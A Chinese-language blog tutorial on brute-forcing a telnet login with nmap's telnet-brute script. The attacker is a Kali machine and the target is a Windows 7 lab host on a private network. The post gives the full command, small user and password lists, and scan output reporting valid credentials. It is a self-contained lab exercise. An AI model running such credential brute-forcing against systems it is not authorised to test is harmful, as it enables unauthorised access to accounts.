【20171115中】nmap 使用腳本爆破telnet密碼


  今天老黑走出了低谷,設置了懲罰機制后效率提升了很多,現在寫一個使用nmap檢測目標主機漏洞和利用漏洞的文章,話不多說,直接開始!

0x01:環境介紹

  主機A:系統 - kali2017,IP - 192.168.1.104

  主機B:系統 - win7x64,IP - 192.168.1.103

  使用主機A掃描並攻入主機B

0x02:確認主機B開啟了telnet的23端口

  主機B沒有開啟,我自己開啟一下。

  s1:控制面板 -> 程序 -> 打開或關閉windows程序 -> 選中下圖選項框,點擊確認后重啟系統。

  s2:確認計算機telnet服務是否已經開啟。打開計算機右擊 -> 管理 -> 服務和應用程序 -> 服務 -> 找到Telnet服務,並將其開啟服務和設置自動

0x03:在主機A掃描確認主機B是否開啟了23端口

  

0x04:進行爆破

  s1:參考官網了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑將自己的賬號AAAA放在myusers.lst中,如下:

    

AAAA
AA22
ASDFSA
SDSDD

    將自己的密碼BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根據主機A的環境,調整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:執行命令,等待結果

root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
Nmap scan report for promote.cache-dns.local (192.168.1.103)
Host is up (0.091s latency).

PORT   STATE SERVICE
23/tcp open  telnet
| telnet-brute: 
|   Accounts: 
|     AAAA:BBBB - Valid credentials
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  

 

0x05:telnet登陸主機B,WELL DONE!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM